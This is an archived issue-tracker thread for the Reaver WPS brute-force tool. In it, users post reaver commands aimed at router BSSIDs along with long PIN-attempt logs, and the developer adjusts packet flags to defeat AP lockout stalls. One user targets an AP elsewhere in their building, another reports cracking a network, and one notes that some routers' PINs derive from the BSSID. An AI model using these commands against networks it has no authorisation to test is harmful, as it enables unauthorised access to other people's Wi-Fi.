Closed GoogleCodeExporter closed 9 years ago
It seems it's just triggering the AP's timeout mechanism.
Original comment by ore...@gmail.com
on 29 Dec 2011 at 11:21
That is, after a few minutes, the pins begin to change again, then it gets
'stuck' for a few minutes and keeps going.
Original comment by ore...@gmail.com
on 29 Dec 2011 at 11:22
I am experiencing the same problem
runnning SVN revision 16 on Backtrack5 R1 32bit inside vmware using RTL8187L
base Afla card
/reaver -i wlan0 -b 00:1c:10:08:b7:a5 -vv -c 6
Reaver v1.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Switching wlan0 to channel 6
[+] Waiting for beacon from 00:1C:10:08:B7:A5
[+] Switching wlan0 to channel 6
[+] Associated with 00:1C:10:08:B7:A5 (ESSID: linksys)
[+] Trying pin 06691783
[!] WARNING: Receive timeout occurred
[+] Trying pin 06691783
[+] Trying pin 06691783
[!] WARNING: Receive timeout occurred
[+] Trying pin 06691783
[!] WARNING: Receive timeout occurred
[+] Trying pin 06691783
[+] Trying pin 06691783
[!] WARNING: Receive timeout occurred
[+] 0.00% complete @ 0 seconds/attempt
[+] Trying pin 06691783
[!] WARNING: Receive timeout occurred
[+] Trying pin 06691783
[+] Trying pin 06691783
[!] WARNING: Receive timeout occurred
[+] Trying pin 06691783
[!] WARNING: Receive timeout occurred
[!] WARNING: 10 failed connections in a row
[+] Trying pin 06691783
[+] 0.00% complete @ 0 seconds/attempt
[+] Trying pin 06691783
[!] WARNING: Receive timeout occurred
[+] Trying pin 06691783
[!] WARNING: Receive timeout occurred
[+] Trying pin 06691783
[+] Trying pin 06691783
[!] WARNING: Receive timeout occurred
[+] Trying pin 06691783
[!] WARNING: Receive timeout occurred
[+] 0.00% complete @ 0 seconds/attempt
[+] Trying pin 06691783
[+] Trying pin 06691783
[!] WARNING: Receive timeout occurred
[+] Trying pin 06691783
Original comment by jcdento...@gmail.com
on 29 Dec 2011 at 11:22
Attachments:
Seems my issue over there
http://code.google.com/p/reaver-wps/issues/detail?id=10
is the same...
Original comment by S3M73X
on 30 Dec 2011 at 1:35
[deleted comment]
Exactly the same here.
SVN revision 16 on Ubuntu 10.04 32bit and Atheros ath5k
http://pastebin.com/i1A85U3A
Original comment by eb4...@gmail.com
on 30 Dec 2011 at 2:12
same. BT5 with alfa.
Original comment by tehca...@gmail.com
on 30 Dec 2011 at 4:47
[deleted comment]
Timeouts can occur legitimately (dropped packets, interference, etc), but
should not be this severe provided you have a good signal from the target AP
and that the AP supports WPS.
These errors were also encountered and reproduced in the course of working on
issue #6. The latest check-in seems to have fixed these timeout warnings for
me; check out r20 and see if you still get the same issues.
Original comment by cheff...@tacnetsol.com
on 30 Dec 2011 at 2:32
the signal is pretty good since I am 1 meter from my Linksys WRT54G2 v1 router
on my table
I am running r22 now and the same problem
trying the same pin over and over again with timeouts
this time I am using Atheros based card inside BT5 x64
on the other hand my BT5 32bit with r18 is working against AP somewhere in my
building and so far I am @25%
could it be that my linksys is not vulnerable?
Original comment by jcdento...@gmail.com
on 30 Dec 2011 at 3:13
WRT54G2 should support WPS - make sure it's enabled.
I am having no issues in either BT5 RC1 32 or 64 bit. Could you try your 32bit
box against the Linksys as well and see if you get the same problem? If you do,
then I'd suspect it's an issue with the AP. If not, then maybe it's a 32 vs 64
bit issue with the code.
Original comment by cheff...@tacnetsol.com
on 30 Dec 2011 at 3:20
I factory reset that AP, just enabled WPS and configured WPA password.
tested with r18 at BT5 R1 32bit as well and was seeing the same results.
signal is good and AP is responding with NACK as you can see in my attached
pcap file.
but it could easily be that it is my AP's issue.
Thanks for such a great piece of SW :)
Original comment by jcdento...@gmail.com
on 30 Dec 2011 at 3:36
No attached pcap. :(
If the code is working against other APs, I'd suspect that it's an AP issue.
Although adding support for the AP may require a code change.
Original comment by cheff...@tacnetsol.com
on 30 Dec 2011 at 3:42
I meant attached pcap in comment #3 in this thread
Original comment by jcdento...@gmail.com
on 30 Dec 2011 at 4:03
Ah, gotcha. It looks like reaver is functioning normally, but the AP is
responding with a premature NACK message.
The only thing I can think of is that a) It doesn't support WPS registrars or
b) There is already an external registrar that has registered with the AP.
Though I actually doubt either of those are the case.
I will see if I can get a hold of one of these to test it myself.
Original comment by cheff...@tacnetsol.com
on 30 Dec 2011 at 4:10
Issue 10 has been merged into this issue.
Original comment by cheff...@tacnetsol.com
on 30 Dec 2011 at 4:29
I am getting the same thing on a Cisco DPC3825 DOCSIS 3.0 Gateway. Just
reconfigured WPS and connected my win7 laptop using WPS.
testing with BT5 R1
after about 2-5 mins keys started rolling again for about a minute and started
locking up again.
Original comment by psycon...@gmail.com
on 30 Dec 2011 at 5:21
I have sniffed a successful PIN-Authentication with Windows7 as a Client
(dbg_sucessfull_connection_win7.pcap) and the easybox 803 as the AP. I have
attached the .pcap file so i hope it might help you to track down the source of
the problem.
Diff it with the other pcap-file where reaver failed in svn-version r25 that
might help. (dbg_alfa_arcadyan_reaver_r25.pcap)
In the first look there is e.g. the Connection Type Flags in the EAP "Response
Expanded Type, WPS, M2" that has the IBSS flag set.
And then in the same packet the "Config Methods" differ whereas in the working
one the flag for "Push Button" is set and in the packets generated by reaver
its not. And so on...
Unfortunately i don't have the spec of the wifi-alliance so i can't tell whats
necessary and whats not but i guess you have em? So i hope this could help in
making the tool work with more routers.
Original comment by S3M73X
on 30 Dec 2011 at 5:26
Attachments:
btw. in the former post filter in wireshark for "eapol" then look at packet #24
from "dbg_alfa_arcadyan_reaver_r25.pcap " and compare it to the packet #29 in
"dbg_sucessfull_connection_win7.pcap" ... i guess somewhere there could be the
error
Original comment by S3M73X
on 30 Dec 2011 at 5:29
Thanks, pcaps are very helpful. :) I'm going through and changing the options
to mimic the win7 capture to see if that fixes things.
Original comment by cheff...@tacnetsol.com
on 30 Dec 2011 at 5:58
OK, just made a check in that changes some of what (I think) are the more
critical flags in the M2 packet. See if that gets you any farther with these
APs.
Original comment by cheff...@tacnetsol.com
on 30 Dec 2011 at 6:20
[deleted comment]
[deleted comment]
Same problem here with latest checkout:
I'm on 32bit and use ath5k
$ sudo ./reaver -i mon0 -b **:**:**:**:68:65 -vvv
Reaver v1.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Waiting for beacon from **:**:**:**:68:65
[+] Switching mon0 to channel 6
[+] Associated with **:**:**:**:68:65 (ESSID: *************)
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] 0.00% complete @ 0 seconds/attempt
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] Trying pin 51408411
[!] WARNING: 10 failed connections in a row
[+] Trying pin 51408411
[+] 0.00% complete @ 0 seconds/attempt
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] 0.00% complete @ 0 seconds/attempt
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] Trying pin 51408411
[!] WARNING: 10 failed connections in a row
[+] Trying pin 51408411
[+] 0.00% complete @ 0 seconds/attempt
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] 0.00% complete @ 0 seconds/attempt
[+] Trying pin 51408411
[!] WARNING: Receive timeout occurred
[+] Trying pin 51408411
[+] Trying pin 51408411
[+] Trying pin 51408411
[!] WARNING: 10 failed connections in a row
[+] Trying pin 51408411
[+] 0.00% complete @ 0 seconds/attempt
[+] Trying pin 51408411
Original comment by nop...@gmail.com
on 30 Dec 2011 at 6:42
It is still the same Problem after trying with reaver r26.
And i cannot see either the Push-Button nor the IBSS flag in the M2-packet.
Pcap attached.
Original comment by S3M73X
on 30 Dec 2011 at 7:11
Attachments:
S3M73X,
It looks like you need to do a 'make cleanall' then './configure && make' to
ensure you've re-built all the code in the sub-directories too.
Original comment by cheff...@tacnetsol.com
on 30 Dec 2011 at 7:17
tried r26. still having the same issue.
Original comment by psycon...@gmail.com
on 30 Dec 2011 at 7:33
I uploaded three screenshots where you can see the reaver-EAP-M2-packet on the
left and the win7-connection-M2-packet on the right with some important(?)
differences highlitet. Note that there are more differences.
The file on the left: "reaver_r26_dbg_diffs.pcap" is attached
The file on the right: "dbg_sucessfull_connection_win7.pcap" has allready been
attached earlier in this issue-thread.
I am pretty sure that missing parameters/flags are not a good idea when you
want a very wide coverage of access-points to be attackable with that tool?
In screenshot "3_association_state.png" the missing association-state is also
something i guess could make the AP NACK-off the client?
Original comment by S3M73X
on 30 Dec 2011 at 7:41
Attachments:
I tried r21 this morning and the problem disappeared (Ubuntu 10.04 32bit +
ath5k). It's still running...
Original comment by eb4...@gmail.com
on 30 Dec 2011 at 7:48
When I run Reaver, my settings exactly match those from the win7 capture that
you highlighted above:
IBSS is set
Label, display and push button config methods are set
Association state is connection success
There is one other change that I made in the M2 settings, which is the
supported bands setting (set to 2.4ghz). I notice that your M2 messages do have
this option, but not the three options above. Based on the files modified to
make these changes, I suspect that you still need to do a full re-build of the
code:
make cleanall
./configure
make
If you do that, you should see all of those values correctly set in the M2
packet, and hopefully that will appease the AP.
Original comment by cheff...@tacnetsol.com
on 30 Dec 2011 at 7:49
Yep, a "make cleanall" works better then the "make clean" i used before.
Also did delete it and did a new check-out as well now the flags are set but
result is the same:
-------------
root@fuckup:src $ ./reaver -i mon0 -b 7C:4F:B5:C8:64:09 -vv
Reaver v1.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Waiting for beacon from 7C:4F:B5:C8:64:09
[+] Switching mon0 to channel 1
[+] Associated with 7C:4F:B5:C8:64:09 (ESSID: EasyBox-C86429)
[+] Trying pin 11902461
[+] Trying pin 11902461
[+] Trying pin 11902461
[+] Trying pin 11902461
[+] Trying pin 11902461
[+] Trying pin 11902461
[+] 0.00% complete @ 0 seconds/attempt
[+] Trying pin 11902461
[+] Trying pin 11902461
[+] Trying pin 11902461
[+] Trying pin 11902461
[!] WARNING: 10 failed connections in a row
---------------------
pcap-file attached below
Original comment by S3M73X
on 30 Dec 2011 at 8:35
Attachments:
OK, I added some additional fields so the Reaver M2 packet should look nearly
identical to the win7 M2 packet now.
Original comment by cheff...@tacnetsol.com
on 30 Dec 2011 at 9:15
[deleted comment]
I know its not the same topic, but i have a question:
i often get the warning: failed to associate with xx.xx...(BSSID) what does
this mean?
Am i too far away from the AP or is there a correlation with used MAC-Adress
filter maybe?
Injection and all is working fine, got one cracked in 5 hours so i just wanted
to say your open source programm is awesome, thx for sharing it.
Original comment by 1337_sp...@gmx.ch
on 30 Dec 2011 at 10:16
WARNING: Receive timeout occurred
[+] Trying pin 12033942
[!] WARNING: Receive timeout occurred
[+] Trying pin 12033942
[!] WARNING: Receive timeout occurred
[+] 5.77% complete @ 3 seconds/attempt
[+] Trying pin 12033942
[!] WARNING: Receive timeout occurred
[+] Trying pin 12033942
[!] WARNING: Receive timeout occurred
[+] Trying pin 12033942
[!] WARNING: Receive timeout occurred
[+] Trying pin 12033942
[!] WARNING: Receive timeout occurred
[+] Trying pin 12033942
[!] WARNING: Receive timeout occurred
[!] WARNING: 10 failed connections in a row
[+] 5.77% complete @ 3 seconds/attempt
[+] Trying pin 12033942
[!] WARNING: Receive timeout occurred
[+] Trying pin 12033942
[!] WARNING: Receive timeout occurred
[+] Trying pin 12033942
[!] WARNING: Receive timeout occurred
[+] Trying pin 12033942
[!] WARNING: Receive timeout occurred
[+] Trying pin 12033942
[!] WARNING: Receive timeout occurred
[+] 5.77% complete @ 3 seconds/attempt
[+] Trying pin 12033942
[!] WARNING: Receive timeout occurred
[+] Trying pin 12033942
[!] WARNING: Receive timeout occurred
[+] Trying pin 12033942
[!] WARNING: Receive timeout occurred
[+] Trying pin 12033942
[+] Trying pin 68253943
[+] 5.79% complete @ 3 seconds/attempt
[+] Trying pin 83123948
[+] Trying pin 53443946
[+] Trying pin 47133945
[+] Trying pin 54193949
[+] Trying pin 37683948
still having intermittent timeouts using r30.
Original comment by psycon...@gmail.com
on 30 Dec 2011 at 10:39
Attachments:
@ 1337_speak:
Yes, if you are having intermittent failed association messages I'd suspect
that either the signal strength of the AP is low (or your signal strength at
the AP is low), or there is interference from other networks.
@psycon:
I haven't looked at the pcap, but timeout warnings are not uncommon. Usually
what has happened is that a packet was dropped or corrupted and the AP is stuck
in a wait state for a couple of minutes waiting for the next packet. During
this time it will not accept new WPS attempts, so you end up getting a bunch of
timeouts for a couple of minutes, then things start going again. If you are
getting a lot of these, even with a strong signal from the AP and little
wireless interference (especially if it is manifesting itself for only one
particular device), please open a new support ticket.
Original comment by cheff...@tacnetsol.com
on 30 Dec 2011 at 11:05
I'm still having lots of Receive timeouts from a nearby AP. Signal strength or
interference is not a problem. Tested 3 different APs with RSSI better than
-70dBm.
These are not intermitent timeouts as in r16, but constant since r21.
reaver-wps v1.2 r32 on Ubuntu 10.04 32bits + ath5k
/reaver -i mon0 -b 00:23:CD:xx:yy:zz -vv
Reaver v1.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Waiting for beacon from 00:23:CD:xx:yy:zz
[+] Associated with 00:23:CD:xx:yy:zz (ESSID: HomeAP1)
[+] Trying pin 89439016
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[+] Trying pin 89439016
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
Original comment by eb4...@gmail.com
on 30 Dec 2011 at 11:54
@eb4fbz:
You won't get very far with signal strengths of -70db. I would fully expect
that you would get receive timeouts with RSSIs that low. However, if you are
getting those same results with stronger signals, this is not the place for
them; please open a new ticket.
Original comment by cheff...@tacnetsol.com
on 31 Dec 2011 at 12:50
@cheff...
Tested with reaver r33.
Okay now it looks a littlebit better. It tries at least some pins before it is
going into the time-out.
Last successfull attempt seems to be in packet #689 in the attached .pcap-dump.
After that point the AP is stopping the EAP-handshake after it received the
EAP-response-identity-packet.
I also tried to log in on a Win7-client but then WPS-PIN-login was no longer
possible, only WPA-PSK. So it might either be a protection mechanism or the
wps-part in the router crashes.
THX for your fixes so far. I will recheck the webinterface of the device.
----------------------------
root@fuckup:src $ ./reaver -i mon0 -b 7C:4F:B5:C8:64:09 -vv -c 1
Reaver v1.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 7C:4F:B5:C8:64:09
[+] Switching mon0 to channel 1
[+] Associated with 7C:4F:B5:C8:64:09 (ESSID: EasyBox-C86429)
[+] Trying pin 75948795
[+] Trying pin 58468791
[+] Trying pin 58658796
[+] Trying pin 34808795
[+] Trying pin 57768793
[+] Trying pin 80888796
[+] 0.05% complete @ 2 seconds/attempt
[+] Trying pin 08358790
[+] Trying pin 30838796
[+] Trying pin 08848796
[+] Trying pin 18108798
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[+] 0.09% complete @ 3 seconds/attempt
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] 0.09% complete @ 6 seconds/attempt
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[!] WARNING: 10 failed connections in a row
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] 0.09% complete @ 9 seconds/attempt
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] 0.09% complete @ 12 seconds/attempt
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[!] WARNING: 10 failed connections in a row
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] 0.09% complete @ 16 seconds/attempt
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] 0.09% complete @ 19 seconds/attempt
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[!] WARNING: 10 failed connections in a row
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] 0.09% complete @ 22 seconds/attempt
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
[!] WARNING: Receive timeout occurred
[+] Trying pin 66998792
^C
----------------------------
Original comment by S3M73X
on 31 Dec 2011 at 1:11
Attachments:
@cheff
yep, the AP is locking down WPS after too many failed attempts.
This is what i saw in the logfiles of the Arcadyan EasyBox 803:
-------------
06/30/2011 00:27:29 [WPS] Lock External Registrar authentication due to too
many failed attempts
06/30/2011 00:27:29 [WPS] External Registrar authentication fail from
00-C0-CA-52-AE-37
06/30/2011 00:27:27 802.1X supplicant 00-C0-CA-52-AE-37 logoff
06/30/2011 00:27:27 [WPS] External Registrar authentication fail from
00-C0-CA-52-AE-37
-------------
This is actually pretty funny since on that particular device you can calculate
the WPS-PIN from the BSSID so it is pwned anyways. ^^
THX for your support! I will be back when i have another WPS-PIN-enabled device
to test.
Original comment by S3M73X
on 31 Dec 2011 at 1:15
Great, glad those changes got it working. Thanks a lot for all the debugging
and pcaps, very helpful!
Original comment by cheff...@tacnetsol.com
on 31 Dec 2011 at 1:18
FYI, I can confirm this behavior on a Netgear WNR1000v2 as well. It does not
broadcast that it has locked WPS, but it responds with NACK messages after
receiving the M2 packet from Reaver. After 4-5 minutes, the AP unlocks and the
pins start incrementing again.
Original comment by cheff...@tacnetsol.com
on 6 Jan 2012 at 8:11
Hey S3M73X, how can I calculate the WPS-Pin from a Easybox using its BSSID?
never heard of such a method...
Original comment by mkle...@minimilian.de
on 23 Feb 2012 at 1:34
I was receiving the same issue. I set the delay to around 7 seconds: -d 7
And it worked well after that.
Original comment by mjhaven...@gmail.com
on 23 Dec 2012 at 5:45
It seems that APs' behaviors vary wildly when it comes to their WPS brute-force
countermeasure implementation. Some have none, others are very strict. Reaver
is robust enough to permit automated pattern matching, if one is identified.
Original comment by ore...@gmail.com
on 23 Dec 2012 at 5:54
[deleted comment]
Hello all I am fairly new to backtrack. Please help me with my problem! I
can't seem to find any advice about my specific issue anywhere on the web and
would really appreciate some help.
I am using the Alfa awus036h with virtual box on windows 7.
Checked to make sure it was connected and put it in monitor mode.
root@bt:~# airmon-ng
Interface Chipset Driver
mon0 Realtek RTL8187L rtl8187 - [phy1]
wlan0 Realtek RTL8187L rtl8187 - [phy1]
killed all interfering processes.
root@bt:~# airmon-ng check
Process with PID 2255 (wash) is running on interface mon0
Process with PID 2426 (airodump-ng) is running on interface mon0
Process with PID 2434 (airodump-ng) is running on interface mon0
root@bt:~# reaver -i mon0 -b 38:6B:BB:D2:39:B5 -c 6 -s -l -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Switching mon0 to channel 6
[+] Waiting for beacon from 38:6B:BB:D2:39:B5
[+] Associated with 38:6B:BB:D2:39:B5 (ESSID: Fibertel WiFi661)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2013-11-15 22:56:53 (0 seconds/pin)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[!] WARNING: 10 failed connections in a row
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2013-11-15 22:59:43 (0 seconds/pin)
It keeps going through the same process and never changing the pin. Please
help in any way you can! Thanks!!
Original comment by tim.sant...@gmail.com
on 16 Nov 2013 at 2:24
how it is fixed? same issue here. no fix yet?
Original comment by radutmar...@gmail.com
on 8 Jan 2015 at 4:26
Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2015-03-10 22:58:16 (0 seconds/pin)
[+] Max time remaining at this rate: (undetermined) (11000 pins left to try)
[+] Trying pin 12345670
Original comment by radutmar...@gmail.com
on 10 Mar 2015 at 9:10
Original issue reported on code.google.com by
ore...@gmail.com
on 29 Dec 2011 at 10:21